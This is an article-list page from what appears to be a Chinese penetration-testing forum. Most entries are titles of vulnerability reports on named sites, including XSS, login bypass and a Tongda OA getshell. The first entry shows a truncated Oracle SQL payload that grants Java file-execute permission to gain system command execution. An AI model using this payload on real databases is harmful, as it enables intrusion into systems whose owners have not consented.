文章列表

oracle的一些小姿势
渗透测试 回复2次

oracle的一些小姿势

1.执行系统命令select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;select dbms_xm

2020-9-20 06:41 2 6554
国家电网(sgcc.com.cn) 子站 存在敏感信息泄露/用户信息越权修改

国家电网(sgcc.com.cn) 子站 存在敏感信息泄露/用户信息越权修改

国家电网(sgcc.com.cn) 子站 存在敏感信息泄露/用户信息越权修改

2020-9-19 19:55 0 4955
联想(lenovo.com.cn)某分站URL跳转导致反射型XSS

联想(lenovo.com.cn)某分站URL跳转导致反射型XSS

联想(lenovo.com.cn)某分站URL跳转导致反射型XSS

2020-9-19 19:52 0 4120
北京银行(bankofbeijing.com.cn)某分站敏感信息泄露

北京银行(bankofbeijing.com.cn)某分站敏感信息泄露

北京银行(bankofbeijing.com.cn)某分站敏感信息泄露

2020-9-19 19:49 1 4491
百年人寿(aeonlife.com.cn)Jkstatus登录绕过

百年人寿(aeonlife.com.cn)Jkstatus登录绕过

百年人寿(aeonlife.com.cn)Jkstatus登录绕过

2020-9-19 19:46 0 4961
搜狐(sohu.com)某子站存在CRLF注入漏洞

搜狐(sohu.com)某子站存在CRLF注入漏洞

搜狐(sohu.com)某子站存在CRLF注入漏洞

2020-9-19 19:42 0 4224
通达OA(tongda2000.com) V11.7 getshell

通达OA(tongda2000.com) V11.7 getshell

通达OA(tongda2000.com) V11.7 getshell

2020-9-19 19:31 2 5030
ourphpCMS(ourphp.net) v2.0.0存在文件上传漏洞

ourphpCMS(ourphp.net) v2.0.0存在文件上传漏洞

ourphpCMS(ourphp.net) v2.0.0存在文件上传漏洞

2020-9-19 19:28 0 4774
通达oa(tongda2000.com)绕过登录越权操作

通达oa(tongda2000.com)绕过登录越权操作

通达oa(tongda2000.com)绕过登录越权操作

2020-9-19 19:24 0 4939
动漫屋(dm5.com)某分站存在存储型XSS漏洞

动漫屋(dm5.com)某分站存在存储型XSS漏洞

动漫屋(dm5.com)某分站存在存储型XSS漏洞

2020-9-19 19:21 0 4052